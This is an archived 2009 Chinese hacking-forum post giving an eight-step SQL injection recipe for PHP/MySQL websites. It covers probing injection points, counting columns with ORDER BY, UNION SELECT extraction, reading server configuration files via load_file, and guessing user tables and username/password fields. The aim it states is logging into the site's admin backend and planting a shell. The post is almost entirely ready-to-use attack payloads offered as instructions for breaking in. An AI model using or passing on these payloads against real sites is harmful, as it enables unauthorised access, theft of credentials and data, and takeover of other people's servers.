【3.A.S.T】网络安全爱好者's Archiver

黑客学习

ynhu33 发表于 2009-6-1 15:52

PHP脚本注入的简单步骤

1~判断注入点~ :’;and 1=1;and 1=2                        -------(跟ASP一样)
2~判断是否能进行UNION查询~:and ord(mid(version(),1,1))>51                 -------(通过版本判断4.0以上可用UNION查询)
3~利用order by 暴字段~:order by X                                                            -------(X为数字 如果返回正常则说明字段大于X)
4~利用union来查询准确字段~: and 1=2 union select 1,2,3,.......                 -------(返回正常,就说明猜到准确字段数。)
5~判断数据库连接帐号有没有写权限~:and (select count(*) from mysql.user)>0  ------- (如果返回错误我们就猜管理员的帐号密码如果返回正常,则可以通过
and 1=2 union select 1,2,3,4,5,6, load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 [注意:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件])
6~猜解XXXX表~:and 1=2 union select 1,2,3,4,5,6.... from user                 --------(XXXX为表单名,返回正常,说明存在这个表)
7~猜XXX字段~:and 1=2 union select 1,username,3,4,5,6.... from XXXX     -------(同样道理,自己替换,如果在2字段显示出字段内容则存在些字段)
8~同理再猜解password字段,猜解成功再找后台登录上SHELL~

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.